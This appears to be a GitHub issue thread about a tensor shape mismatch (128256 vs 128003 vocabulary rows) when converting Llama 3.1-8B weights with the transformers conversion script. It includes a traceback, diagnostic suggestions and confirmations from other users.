huggingface / transformers

πŸ€— Transformers: State-of-the-art Machine Learning for PyTorch, TensorFlow, and JAX.
https://huggingface.co/transformers
Apache License 2.0

convert_llama_weights_to_hf.py, llama3.1-8B, Trying to set a tensor of shape torch.Size([128256, 4096]) in "weight" (which has shape torch.Size([128003, 4096])), this looks incorrect. #33791

Open Itime-ren opened 5 days ago

Itime-ren commented 5 days ago

System Info

python3 /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py \
    --input_dir /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B \
    --model_size 8B \
    --output_dir /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B

You are using the default legacy behaviour of the <class 'transformers.models.llama.tokenization_llama_fast.LlamaTokenizerFast'>. This is expected, and simply means that the legacy (previous) behavior will be used so nothing changes for you. If you want to use the new behaviour, set legacy=False. This should only be set if you understand what it means, and thoroughly read the reason why this was added as explained in https://github.com/huggingface/transformers/pull/24565 - if you loaded a llama tokenizer from a GGUF file you can ignore this message.
Saving a LlamaTokenizerFast to /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B.
Fetching all parameters from the checkpoint at /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B.
/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py:157: FutureWarning: You are using torch.load with weights_only=False (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for weights_only will be flipped to True. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via torch.serialization.add_safe_globals. We recommend you start setting weights_only=True for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.
  loaded = torch.load(os.path.join(input_base_path, "consolidated.00.pth"), map_location="cpu")
Loading the checkpoint in a Llama model.
Loading checkpoint shards:  79%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–Ž      | 26/33 [00:04<00:01, 6.36it/s]
Traceback (most recent call last):
  File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 478, in <module>
    main()
  File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 465, in main
    write_model(
  File "/home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py", line 324, in write_model
    model = LlamaForCausalLM.from_pretrained(tmp_model_path, torch_dtype=torch.bfloat16, low_cpu_mem_usage=True)
  File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 4014, in from_pretrained
    ) = cls._load_pretrained_model(
  File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 4502, in _load_pretrained_model
    new_error_msgs, offload_index, state_dict_index = _load_state_dict_into_meta_model(
  File "/usr/local/lib/python3.10/dist-packages/transformers/modeling_utils.py", line 973, in _load_state_dict_into_meta_model
    set_module_tensor_to_device(model, param_name, param_device, **set_module_kwargs)
  File "/usr/local/lib/python3.10/dist-packages/accelerate/utils/modeling.py", line 373, in set_module_tensor_to_device
    raise ValueError(
ValueError: Trying to set a tensor of shape torch.Size([128256, 4096]) in "weight" (which has shape torch.Size([128003, 4096])), this looks incorrect.
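The ValueError means the checkpoint's embedding matrix has 128256 rows (the Llama 3/3.1 vocabulary size) while the model the converter instantiated expects only 128003, i.e. the generated config's vocab_size does not match the weights. A minimal diagnostic sketch for confirming this, assuming Meta's usual consolidated-checkpoint layout (the tok_embeddings.weight key) and reusing the paths from this report; the config.json check only applies if the converter got far enough to write it:

import json
import torch

# Load the original Meta checkpoint; weights_only=True is the safer mode
# the FutureWarning above recommends, and a plain dict of tensors loads
# fine with it.
ckpt = torch.load(
    "/Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B/consolidated.00.pth",
    map_location="cpu",
    weights_only=True,
)
# Llama 3.1-8B should report torch.Size([128256, 4096]) here.
print(ckpt["tok_embeddings.weight"].shape)

# Compare against the vocab_size the converter wrote out; the traceback
# implies this ends up as 128003 instead of 128256.
with open(
    "/Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B/config.json"
) as f:
    print(json.load(f)["vocab_size"])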

Who can help?

No response

Reproduction

python3 /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py \
    --input_dir /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B \
    --model_size 8B \
    --output_dir /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B

Expected behavior

The conversion completes and writes safetensors files to the output directory.
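One possible culprit, offered as an assumption rather than a confirmed fix: the reproduction command never passes the script's --llama_version flag, so the converter may fall back to pre-Llama-3 tokenizer and vocabulary settings, which would produce exactly this kind of vocab_size mismatch. Something along these lines is worth trying (same paths as above; whether the flag accepts "3.1" depends on the transformers checkout in use):

python3 /home/transformers/src/transformers/models/llama/convert_llama_weights_to_hf.py \
    --input_dir /Data_disk/meta_llama/meta_llama3.1/Meta-Llama-3.1-8B \
    --model_size 8B \
    --llama_version 3.1 \
    --output_dir /Data_disk/meta_llama/safetensors/meta_llama3.1/llama3.1-8B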

7180918-Madams commented 4 days ago

Having exactly the same problem (same tensor sizes and everything) at exactly the same point in the conversion. Also worth noting that I had to remove the add_special_tokens parameter from the Llama3Converter call to get the script to run at all, since it was raising an "unexpected keyword" error; that removal might have contributed to the irregular tensor sizes (a quick check for this is sketched below).
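An "unexpected keyword" error usually points at a version skew between the conversion script and the installed transformers package. A small sketch for checking that, under the assumption that the script's Llama3Converter still subclasses TikTokenConverter from transformers.convert_slow_tokenizer:

import inspect

from transformers.convert_slow_tokenizer import TikTokenConverter

# If add_special_tokens is missing from this signature, the installed
# transformers is older than the conversion script being run, which would
# explain the "unexpected keyword" error, and removing the argument would
# then skip adding the reserved special tokens to the vocabulary.
print(inspect.signature(TikTokenConverter.__init__))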

PaulRivaud commented 3 days ago

Encountering the same issue, with identical tensor sizes and progression percentage.